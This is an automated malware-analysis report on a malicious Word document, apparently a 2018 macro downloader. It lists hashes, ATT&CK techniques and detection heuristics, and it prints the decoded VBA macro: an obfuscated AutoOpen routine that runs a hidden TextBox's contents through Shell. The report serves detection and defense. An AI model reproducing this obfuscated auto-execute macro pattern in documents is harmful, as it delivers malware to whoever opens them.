Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8dcc90e3dafa933…

MALICIOUS

Office (OLE)

143.4 KB Created: 2018-12-19 07:12:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: d0953c82012236f8c4888ae4f502550e SHA-1: cf6540773ed973eeaf4588f1f45c68a84b49ae62 SHA-256: c8dcc90e3dafa9333a74350466330a04337a522598076e97fc54a07b62e31d8e
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate the use of the Shell() function to execute commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Generic-6788980-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6788980-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                  End Select
P94446352 = Array(m385804293, P5412060, A22804128, Interaction.Shell(R07544554762.TextBox1, 31 - 31), U44043)
   Select Case m196
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
i67303792
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4807 bytes
SHA-256: 6604dea4d0e66accaa79248363778812bea46e9d58e056c353007ce82ffb365e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "R07544554762"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
i67303792
End Sub

Attribute VB_Name = "N48564231"
Function i67303792()
On Error Resume Next
   Select Case q4980
         Case 330998156
Q736 = F779
            z637 = Tan(m587 - Round(o334) / 341911400 - Tan(j1237))
X3269 = Z376
M313 = Round(n750 * Chr(106457969))
         Case 208112041
E5066 = f665
            G065 = 301969932
P4839 = F0353
            u7797 = Round(I090 + Tan(A1992 + Log(305602630) - i385 / Hex(223075246)))
              End Select
   Select Case h3865
         Case 172428590
Q014 = M634
            d606 = Tan(I613 - Round(Q2311) / 77887831 - Tan(H2478))
O515 = a436
u4111 = Round(G363 * Chr(333807020))
         Case 13977045
j149 = U2199
            j148 = 51715933
u4834 = A3591
            G643 = Round(T517 + Tan(q5916 + Log(307710191) - w041 / Hex(338600911)))
              End Select
   Select Case O423
         Case 226374491
P1769 = f9139
            F516 = Tan(B184 - Round(A6538) / 175044476 - Tan(R905))
R954 = f8620
Q912 = Round(Q2204 * Chr(164755658))
         Case 24298859
J611 = k496
            H2171 = 139384503
p712 = V848
            l868 = Round(q4246 + Tan(K5768 + Log(277100825) - C6718 / Hex(317291469)))
              End Select
P94446352 = Array(m385804293, P5412060, A22804128, Interaction.Shell(R07544554762.TextBox1, 31 - 31), U44043)
   Select Case m196
         Case 133175371
z100 = N746
            s7056 = Tan(q4043 - Round(F547) / 292757480 - Tan(j9756))
h0025 = m420
E378 = Round(N671 * Chr(335595334))
         Case 178297829
d7950 = j3411
            j7798 = 209324246
L2335 = t472
            d0214 = Round(j9866 + Tan(p1202 + Log(205860149) - i0523 / Hex(260646574)))
              End Select
   Select Case r6403
         Case 48838733
T6177 = P843
            C421 = Tan(n263 - Round(I5719) / 192322963 - Tan(O0101))
Q8506 = k531
T859 = Round(f879 * Chr(4939320))
         Case 72417324
T798 = b522
            l9398 = 218984667
d505 = i222
            P4426 = Round(i148 + Tan(U0892 + Log(132067500) - i6591 / Hex(95495477)))
              End Select
End Function


Attribute VB_Name = "i107726289"

Attribute VB_Name = "m78509262"

Attribute VB_Name = "O26765419"

Attribute VB_Name = "A1519357247990"

Attribute VB_Name = "I5201207615"

Attribute VB_Name = "q9197819092"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "p7478912681"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F8688407688030"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "b396820358"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Q32128734218"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P0685989163320"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T135436896"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.